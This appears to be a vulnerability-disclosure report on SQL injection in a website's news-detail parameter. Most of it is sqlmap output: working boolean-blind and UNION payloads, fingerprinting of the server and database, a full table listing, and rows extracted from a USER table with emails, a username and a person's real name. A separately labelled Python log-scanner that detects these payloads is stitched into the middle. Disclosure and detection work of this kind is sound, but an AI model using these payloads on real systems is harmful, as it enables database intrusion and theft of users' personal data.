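2015-12-07: Details reported to the vendor; awaiting vendor response
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and relevant domain experts
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to trainee white hats
2016-01-21: Details disclosed to the public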
As the title says.
Injection point: http://**.**.**.**/index.php?fn=news&fn1=detail&no=285&no5=C
sqlmap identified the following injection point(s) with a total of 100 HTTP(s) requests:
---
Parameter: no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fn=news&fn1=detail&no=285 AND 9559=9559&no5=C

    Type: UNION query
    Title: MySQL UNION query (14) - 11 columns
    Payload: fn=news&fn1=detail&no=-7065 UNION ALL SELECT 14,CONCAT(0x7178787a71,0x525074796575674d7456,0x7162706271),14,14,14,14,14,14,14,14,14#&no5=C
---
web server operating system: Linux Fedora
web application technology: Apache 2.2.19, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
current database: 'NTCU'
current user is DBA: True
available databases [4]:
[*] information_schema
[*] mysql
[*] NTCU
[*] performance_schema
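A defensive check for the two techniques sqlmap reports above, as an added example that is not part of the original report: it scans web access-log lines and flags requests whose `no` parameter is not a plain integer. The log lines are constructed, and treating `no` as an integer record ID is an assumption inferred from the URL, as are the names `classify`, `scan` and `NUMERIC_PARAMS`.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: `no` carries an integer record ID (inferred from no=285 in the URL).
NUMERIC_PARAMS = {"no"}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
# Numeric comparison chained with AND/OR, the shape of "AND 9559=9559".
BOOL_RE = re.compile(r"\b(?:and|or)\s+\d+\s*(?:=|<>|!=|<|>)\s*\d+", re.I)

# Constructed access-log lines (Apache combined-style, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Dec/2015:21:10:01 +0800] '
    '"GET /index.php?fn=news&fn1=detail&no=285&no5=C HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Dec/2015:21:11:40 +0800] '
    '"GET /index.php?fn=news&fn1=detail&no=285%20AND%209559%3D9559&no5=C HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Dec/2015:21:11:41 +0800] '
    '"GET /index.php?fn=news&fn1=detail&no=-7065%20UNION%20ALL%20SELECT%2014%2C14%23&no5=C HTTP/1.1" 200 4096',
]

def classify(value):
    """Label a decoded value of a numeric parameter; None means a plain integer."""
    if re.fullmatch(r"\d+", value):
        return None
    if UNION_RE.search(value):
        return "union-query"
    if BOOL_RE.search(value):
        return "boolean-blind"
    return "non-numeric"

def scan(log_lines):
    """Return (line number, parameter, label) for each suspicious request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the expected format
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes the values, so %20 and %3D are normalised here.
        for key, value in parse_qsl(query, keep_blank_values=True):
            label = classify(value) if key in NUMERIC_PARAMS else None
            if label:
                findings.append((lineno, key, label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the SQL statement, closes both techniques at once.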
Tables:
back-end DBMS: MySQL 5
Database: NTCU
[68 tables]
+--------------+
| ABOUT        |
| AIRCRAFT     |
| ASK          |
| BILLPIC      |
| BINEWS       |
| BPRODID      |
| CALENDER     |
| CARDLOVE     |
| CARDSTYLE    |
| CARDTOMAIL   |
| CHANGEITEM   |
| CITEM        |
| CODIFICATION |
| COMPANY      |
| CPRODID      |
| DATAS        |
| DISORID      |
| DISSAY       |
| DOWN         |
| DOWNCATE     |
| DOWNFILE     |
| EMAN         |
| EPACIL       |
| EPAPER       |
| EPAPROCIL    |
| EPASENDS     |
| EPATOMAIL    |
| EPA_PROD     |
| EVABPRID     |
| EVACPRID     |
| EVADOWN      |
| FACTORY      |
| GRPSELK      |
| IMPROERR     |
| INDPIC       |
| INFORMATION  |
| JOIN1        |
| JOINACTIVE   |
| JOINOTHMSG   |
| JOINPAPER    |
| MARK         |
| MSG          |
| MSGTOMAIL    |
| NEWS2        |
| OTHMSG       |
| PAPER_ST     |
| SENDINTURN   |
| SEP          |
| STKIND       |
| SYSCUST      |
| SYSPAYKIND   |
| SYSTEMSET    |
| SYSUSER2     |
| USERGROUP    |
| USERINGROUP  |
| USERLOG      |
| USER_COL     |
| USER_DCOL    |
| USER_DTL     |
| VOTECIL      |
| VOTEPA       |
| VOTESENDS    |
| VOTETIL      |
| VOTETOMAIL   |
| VOTE_RE      |
| VOTE_SUB     |
| VOTE_SUBL    |
| USER         |
+--------------+
There are too many tables to go through carefully, so I only looked at one, the user table.
Table: USER
[5 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| jobid    | non-numeric |
| name     | non-numeric |
| userid   | non-numeric |
| userpass | non-numeric |
+----------+-------------+
Partial data:
[21:12:03] [INFO] retrieved: willianman@**.**.**.**
[21:12:03] [INFO] retrieving the length of query output
[21:12:03] [INFO] retrieved: 10
[21:12:22] [INFO] retrieved: willianman
[21:12:22] [INFO] retrieving the length of query output
[21:12:22] [INFO] retrieved: 19
[21:12:44] [INFO] retrieved: owl3316@**.**.**.**
[21:12:44] [INFO] retrieving the length of query output
[21:12:44] [INFO] retrieved: 1
[21:12:47] [INFO] retrieved: N
[21:12:52] [INFO] retrieving the length of query output
[21:12:52] [INFO] retrieved: 3
[21:14:18] [INFO] retrieved: 廖彥涵
[21:14:18] [INFO] retrieving the length of query output
[21:14:18] [INFO] retrieved: 19
[21:14:46] [INFO] retrieved: owl3316@**.**.**.**
[21:14:46] [INFO] retrieving the length of query output
[21:14:46] [INFO] retrieved: 7
[21:15:02] [INFO] retrieved: owl3316
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-12-08 19:52
Thank you for the report.
None yet